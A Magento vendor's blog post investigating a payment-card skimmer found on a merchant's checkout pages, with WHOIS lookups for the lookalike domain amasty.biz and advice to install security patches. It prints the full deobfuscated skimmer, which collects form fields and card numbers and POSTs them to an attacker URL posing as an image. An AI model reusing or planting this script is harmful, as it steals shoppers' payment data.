Why you should install Magento security patches [Fraud investigation]

Why you should install Magento security patches

TODAY WE FACED A SERIOUS FRAUD SITUATION, WHICH WAS A TYPICAL ONE AT FIRST SIGHT, BUT ALSO IT LOOKED LIKE AN ATTEMPT TO HURT AMASTY REPUTATION. BUT, OF COURSE AND FIRST OF ALL, IT’S A LIVE EXAMPLE OF HOW E-COMMERCE FRAUD WORKS WHEN USERS ARE RELUCTANT TO FOLLOW SECURITY RULES.

We are publishing this story to show our clients and all Magento merchants how important it is to timely install security patches.

This morning we’ve got a message from a hosting company.

Initial report about the fraud

It was the hosting company employee, not the Magento site owner, who sent us the script. It collects payment data from the Magento checkout pages and sends them to https://amasty.biz/lib/paypal_icon.png.

As we are not associated with amasty.biz in any way, of course we confirmed that the script was a malware and suggested deleting it from the website.

Amasty.biz is redirecting to amasty.com. It may look like we are somehow connected to  amasty.biz, but here we wanted to officially announce once again: Amasty is not related to  amasty.biz fraud in any way.

WHOIS lookup of amasty.biz is not helpful:

$ whois amasty.biz
Domain Name:                                 AMASTY.BIZ
Domain ID:                                   D70130289-BIZ
Sponsoring Registrar:                        EVOPLUS LTD.
Sponsoring Registrar IANA ID:                1418
Registrar URL (registration services):       www.evonames.com
Domain Status:                               ok
Variant:                                     AMASTY.BIZ
Registrant ID:                               MR_8788991WP
Registrant Name:                             WhoisProtectService.net
Registrant Address1:                         27 Old Gloucester Street
Registrant City:                             London
Registrant Postal Code:                      WC1N 3AX
Registrant Country:                          UNITED KINGDOM
Registrant Country Code:                     GB
Registrant Phone Number:                     +44.02074195061
Registrant Email:                            amasty.biz@whoisprotectservice.net
Administrative Contact ID:                   MR_8788991WP
Administrative Contact Name:                 WhoisProtectService.net
Administrative Contact Address1:             27 Old Gloucester Street
Administrative Contact City:                 London
Administrative Contact Postal Code:          WC1N 3AX
Administrative Contact Country:              UNITED KINGDOM
Administrative Contact Country Code:         GB
Administrative Contact Phone Number:         +44.02074195061
Administrative Contact Email:                amasty.biz@whoisprotectservice.net
Billing Contact ID:                          MR_8788991WP
Billing Contact Name:                        WhoisProtectService.net
Billing Contact Address1:                    27 Old Gloucester Street
Billing Contact City:                        London
Billing Contact Postal Code:                 WC1N 3AX
Billing Contact Country:                     UNITED KINGDOM
Billing Contact Country Code:                GB
Billing Contact Phone Number:                +44.02074195061
Billing Contact Email:                       amasty.biz@whoisprotectservice.net
Technical Contact ID:                        MR_8788991WP
Technical Contact Name:                      WhoisProtectService.net
Technical Contact Address1:                  27 Old Gloucester Street
Technical Contact City:                      London
Technical Contact Postal Code:               WC1N 3AX
Technical Contact Country:                   UNITED KINGDOM
Technical Contact Country Code:              GB
Technical Contact Phone Number:              +44.02074195061
Technical Contact Email:                     amasty.biz@whoisprotectservice.net
Name Server:                                 NS1.TOPDNS.ME
Name Server:                                 NS2.TOPDNS.ME
Name Server:                                 NS3.TOPDNS.ME
Created by Registrar:                        EVOPLUS LTD.
Last Updated by Registrar:                   EVOPLUS LTD.
Domain Registration Date:                    Fri Jun 03 11:00:12 GMT 2016
Domain Expiration Date:                      Fri Jun 02 23:59:59 GMT 2017
Domain Last Updated Date:                    Sat Jun 04 04:13:19 GMT 2016
DNSSEC:                                      false

That’s because the owner’s chosen WHOIS protection when registering the domain. Right now we are trying to reach the registrar to freeze the domain, but also we wanted to neutralize the site which is collecting payment data.

We checked the IP and the hosting company the fraud site is using:

$ nslookup amasty.biz 8.8.8.8
Server:      8.8.8.8
Address:     8.8.8.8#53
Non-authoritative answer:
Name:  amasty.biz
Address: 209.126.123.253

Now we know that amasty.biz IP is 209.126.123.253

$ whois 209.126.123.253
NetRange: 209.126.96.0 – 209.126.127.255
CIDR: 209.126.96.0/19
NetName: S4Y-7
NetHandle: NET-209-126-96-0-1
Parent: NET209 (NET-209-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS30083
Organization: server4you Inc. (SERVE-6)
RegDate: 2013-12-26
Updated: 2016-03-19
Ref: https://whois.arin.net/rest/net/NET-209-126-96-0-1
OrgName: server4you Inc.
OrgId: SERVE-6
Address: 210 North Tucker Blvd.
Address: Suite 910
City: Saint Louis
StateProv: MO
PostalCode: 63101
Country: US
RegDate: 2003-04-15
Updated: 2016-05-25
Ref: https://whois.arin.net/rest/org/SERVE-6
OrgAbuseHandle: SAD112-ARIN
OrgAbuseName: server4you Abuse Department
OrgAbusePhone: +1-314-266-3638
OrgAbuseEmail: abuse@server4you.com
OrgAbuseRef: https://whois.arin.net/rest/poc/SAD112-ARIN

As we see here, the IP is owned by server4you Inc. We made attempts to reach the hosting company support via abuse@server4you.com and asked to switch the site down because of fraud, but right now we cannot boast of any response, still we did everything we could here.

To investigate further, we checked the main page code of the affected site and saw the following part:

Fraud js code

The script is obfuscated, but we do have the deobfuscated version (to get a the deobfuscated variant, you need to replace «this[‘eval’](w);» with «console.log(w);»:

var snd =null;

function start(){
  if((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) {
        send();
       
    }

}
document.addEventListener("DOMContentLoaded", start);

function clk() {
    var inp=document.querySelectorAll("input, select, textarea, checkbox");
    for (var i=0;i<inp.length;i++){ if(inp[i].value.length>0) {
        var nme=inp[i].id;
        if(nme=='') { nme=i; }
        snd+=inp[i].id+'='+inp[i].value+'&';
        }
    }
   
}


function send() {
 var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
    for (var i=0;i<btn.length;i++){
        var b=btn[i];
        if(b.type!='text' && b.type!='slect' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
            if(b.addEventListener) {
                b.addEventListener("click", clk, false);
            }else {
                b.attachEvent('onclick', clk);
            }
        }
    }

    var frm=document.querySelectorAll("form");
    for (var i=0;i<frm.length;i++){
        if(frm[i].addEventListener) {
            frm[i].addEventListener("submit", clk, false);
        }else {
            frm[i].attachEvent('onsubmit', clk);
        }
    }

    if(snd!=null) {
	var cc = new RegExp("[0-9]{13,16}");
		var asd="0";
       if(cc.test(snd)){
		  asd="1" ;
	   }
var http = new XMLHttpRequest();
http.open("POST","https://amasty.biz/lib/paypal_icon.jpg",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("data="+snd+"&asd="+asd+"&id_id=magentosite");
    }
    snd=null;
    setTimeout('send()', 130);
}


To find out why this happened, we checked the affected site with magereport.com.

Fraud - Magereport check

The report shows multiple vulnerabilities of the affected site because its owners haven’t installed a single Magento security patch whatsoever. Pay attention to the Credit Card Hijack point detected.

The script from our case is very similar to the script example from the vulnerability description, the difference is the URL which the data is sent to, and the list of the pages with payment data has been extended.

Fraud code lines difference

Red lines are the lines that do not tally with the magereport.com example, green lines are the lines that are different from the script we found.

And, of course, the main victims of the fraud are customers that enter their payment info on the vulnerable sites.

Surely, Magento merchants can’t be 100% safe from such a situation, but the probability of fraud incidents can be significantly lowered with using safe passwords and installing Magento security patches right after they appear.

Check your site with magereport.com, and if your site is not safe, ask an Amasty professional to install Magento security patches for you.

UPD The registrar confirmed that amasty.biz was blocked.

Andrey Tataranovich

Andrey Tataranovich

Andrei believes that only at work people can fully express themselves, so he does his best to implement all his knowledge while in the office. Having made computer science his hobby, Andrei is constantly developing his professional skills. But despite such a busy schedule he always finds time to read science fiction books and communicate with new interesting people.

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *